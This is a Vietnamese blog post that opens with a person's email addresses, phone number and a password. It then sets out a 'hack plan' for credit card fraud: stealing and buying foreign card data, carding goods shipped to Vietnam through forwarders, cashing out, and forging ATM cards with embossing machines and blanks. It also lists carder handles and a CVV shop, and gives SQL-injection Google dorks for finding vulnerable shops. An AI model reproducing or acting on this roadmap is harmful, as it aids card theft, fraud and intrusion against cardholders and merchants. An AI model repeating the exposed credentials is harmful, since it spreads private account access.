Email và điện thoại
Email chính
nguyennghia271292@gmail.com
Email phục hồi
vnghia665@yahoo.com
Điện thoại
0164 750 6602
pass: 0985749241

Kế hoạch hack
Chuẩn bị
- Lấy cấp thông tin, thẻ tín dụng người nước ngoài - Rao bán thông tin trên mạng/ mua bán thông tin tài khoản tín dụng - Diễn đàn chuyên trộm cấp cc của người nước ngoài - Có cc, mua hàng trên các trang: newegg.com, walmart.com, bnamin.com - Ship hàng về vn, tự ship hoặc thuê người ship - Công ty vận chuyển như mubangiaonhan.com, nhapre.com, giaonhan247.com… - Hack tài khoản, american express, visa, VHF, HVF, HVA - Bán hàng qua mạng (gửi con trojan) - Hack credit card - Cách làm cashout - Tổ chức làm giả thẻ ATM; công đoạn dập thẻ ATM - Diễn dàn hacker thế giới - Máy tạo thẻ ATM có tên ABS ATM card holder (máy ABSR), bán máy ABS ATM card holder; có bán kèm phôi thẻ ATM để in dập thẻ mới - dây chuyền công nghệ sản xuất thẻ ATM - Các tay casher việt nam: chuyên gia” spamer, casher người Việt hora_, tuanpham_, blackcash_, tntr_, gonewiththe_, seam_, secretma_,tieukhucb_, tayninhb_,… - Máy in 3D ATM - tìm hiểu RBS Worldpay - Thiết bị in thẻ Nguồn : http://kenhvietnam.blogspot.com/2013/03/vong-xoay-ug-tam-su-cua-1-hacker.html#ixzz37YomGBnX Trang chủ : http://kenhvietnam.blogspot.com. - Tìm hiểu về deepweb - Tìm hiểu rum UG - tìm hiểu HKV, VSB, vnunder, checker; reg domain free; www.vietworm.net (bên paypal); VHC (vietnamese hacker community); HVA( - Từ khóa tìm lỗi SQL: shopdisplayproducts.asp?id hoặc shopaddtocard.asp?catologid= Các trang khác - Trang dò IP: http://www.ip-adress.com/ - Tải phần mềm dò cc chết hay sống : http://www.apple.com/itunes/download/ - các loại virus: www.trojan (backdoor trojan; trojan download); www.virus; www.rootkit; worm ; - Trang bán cc : http://diendancongty.com/forum/threads/109394-sellerbestcvv-Worldwide-CVVs-Shop-Auto-2424-Good-Cheap-SELL-CCV-UG-TEAM.dvct - Search shop vào trang : nhacpro.biz Inurl: event.php?id= sẻ là dork Vd : inurl : productinfo.php ? id=73 (73 là số tùy ý bạn chọn) - google dork - Google shop v1.0

0 nhận xét:

Post a Comment

 

BACK TO TOP

Xuống cuối trang